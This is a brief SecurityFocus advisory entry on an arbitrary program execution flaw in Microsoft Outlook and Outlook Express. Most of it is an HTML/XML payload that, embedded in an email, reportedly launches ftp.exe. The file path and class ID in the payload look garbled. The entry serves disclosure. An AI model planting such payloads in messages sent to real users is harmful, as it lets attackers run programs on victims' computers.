Microsoft Outlook and Outlook Express Arbitrary Program Execution Vulnerability

Embedding the following object in an HTML message will reportedly cause ftp.exe to be executed:

<xml id=oExec> <security><exploit> <![CDATA[ <object id="oFile"
classid="clsid:11111111-1111-1111-1111"
code base="C:WINDOWSFTP.EXE"></object>]]></exploit></security></xml>
<SPAN dataFld=exploit dataFormatAs=html
dataSrc=#oExec></SPAN>


 

Privacy Statement
Copyright 2010, SecurityFocus